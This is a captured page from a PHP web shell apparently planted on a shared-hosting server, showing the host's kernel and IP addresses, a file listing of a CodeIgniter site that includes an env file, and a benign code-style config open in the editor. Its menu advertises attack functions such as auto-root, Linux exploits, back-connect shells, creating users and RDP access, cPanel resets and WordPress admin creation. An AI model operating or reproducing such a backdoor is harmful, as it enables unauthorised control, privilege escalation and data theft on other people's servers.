Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.223
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
mlm.tradesense.co.ke /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
mlmdesign
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
writable
[ DIR ]
drwxr-xr-x
.no-header.php-cs-fixer.dist.p...
1.4
KB
-rw-r--r--
CHANGELOG.md
363.99
KB
-rw-r--r--
CONTRIBUTING.md
249
B
-rw-r--r--
LICENSE
1.13
KB
-rw-r--r--
README.md
4.9
KB
-rw-r--r--
SECURITY.md
1.37
KB
-rw-r--r--
composer.json
2.43
KB
-rw-r--r--
depfile.yaml
5.01
KB
-rw-r--r--
env
4.4
KB
-rw-r--r--
mlmdesign.zip
8.67
MB
-rw-r--r--
phpstan-baseline.neon.dist
33.38
KB
-rw-r--r--
spark
2.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .no-header.php-cs-fixer.dist.php
<?php declare(strict_types=1); /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ use CodeIgniter\CodingStandard\CodeIgniter4; use Nexus\CsConfig\Factory; use Nexus\CsConfig\Fixer\Comment\NoCodeSeparatorCommentFixer; use Nexus\CsConfig\Fixer\Comment\SpaceAfterCommentStartFixer; use Nexus\CsConfig\FixerGenerator; use PhpCsFixer\Finder; $finder = Finder::create() ->files() ->in([ __DIR__ . '/admin', __DIR__ . '/app', __DIR__ . '/public', ]) ->notName('#Logger\.php$#') ->append([ __DIR__ . '/admin/starter/builds', ]); $overrides = [ 'ordered_class_elements' => [ 'order' => [ 'use_trait', 'constant', 'property', 'method', ], 'sort_algorithm' => 'none', ], ]; $options = [ 'cacheFile' => 'build/.no-header.php-cs-fixer.cache', 'finder' => $finder, 'customFixers' => FixerGenerator::create('vendor/nexusphp/cs-config/src/Fixer', 'Nexus\\CsConfig\\Fixer'), 'customRules' => [ NoCodeSeparatorCommentFixer::name() => true, SpaceAfterCommentStartFixer::name() => true, ], ]; return Factory::create(new CodeIgniter4(), $overrides, $options)->forProjects();
Close